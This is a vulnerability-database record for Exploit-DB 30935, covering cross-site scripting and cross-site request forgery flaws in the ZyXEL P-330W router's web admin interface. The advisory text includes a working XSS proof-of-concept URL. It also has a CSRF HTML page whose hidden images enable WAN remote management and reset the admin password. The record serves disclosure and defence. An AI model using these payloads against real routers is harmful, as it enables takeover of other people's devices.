ID
VAR-E-200712-0197
CVE
cve_id: | CVE-2007-6730 | Trust: 0.3 |
cve_id: | CVE-2007-6729 | Trust: 0.3 |
EDB ID
30935
TITLE
ZYXEL P-330W - Multiple Vulnerabilities - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
ZYXEL P-330W - Multiple Vulnerabilities.. remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | zyxel | model: | p-330w | scope: | - | version: | - | Trust: 1.0 |
vendor: | zyxel | model: | p-330w | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/27024/info
ZyXEL P-330W 802.11g Secure Wireless Internet Sharing Router is prone to multiple cross-site scripting vulnerabilities and cross-site request-forgery vulnerabilities because it fails to properly sanitize user-supplied input. These issues affect the device's web-based administrative interface.
An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The attacker may leverage the cross-site request-forgery issues to perform actions in the context of a device administrator, which can compromise the device.
http://www.example.com:<router_port>/ping.asp?pingstr=â?><script>alert("M
erry Christams")</script>
The following cross-site request-forgery example was provided:
<html><head><title>Chirstmastime is Here</title></head><body>
<img
src="http://www.example.com:<router_port>/goform/formRmtMgt?webWanAccess
=ON&remoteMgtPort=80
80&pingWANEnabled=&upnpEnabled=&WANPassThru1=&WANPassThru2=&WANPassT
hru3=&
submit-url=%2Fremotemgt.asp" width="0" height="0">
<img
src="http://www.example.com:<router_port>/goform/formPasswordSetup?usern
ame=admin&newpass=santa_pw
&confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0"
height="0">
</body>
</html>
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Multiple Vulnerabilities
Trust: 1.0
CREDITS
santa_clause
Trust: 0.6
EXTERNAL IDS
db: | BID | id: | 27024 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 30935 | Trust: 1.6 |
db: | EDBNET | id: | 52548 | Trust: 0.6 |
db: | NVD | id: | CVE-2007-6730 | Trust: 0.3 |
db: | NVD | id: | CVE-2007-6729 | Trust: 0.3 |
REFERENCES
url: | https://www.securityfocus.com/bid/27024/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/30935/ | Trust: 0.6 |
url: | http://www.us.zyxel.com/products/model.php?indexcate=1124750607&indexcate1=1121212137&indexflagvalue=1021876859 | Trust: 0.3 |
url: | http://archives.neohapsis.com/archives/fulldisclosure/2007-12/0560.html | Trust: 0.3 |
SOURCES
db: | BID | id: | 27024 |
db: | EXPLOIT-DB | id: | 30935 |
db: | EDBNET | id: | 52548 |
LAST UPDATE DATE
2022-07-27T09:59:49.636000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 27024 | date: | 2016-07-05T22:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 27024 | date: | 2007-12-25T00:00:00 |
db: | EXPLOIT-DB | id: | 30935 | date: | 2007-12-25T00:00:00 |
db: | EDBNET | id: | 52548 | date: | 2007-12-25T00:00:00 |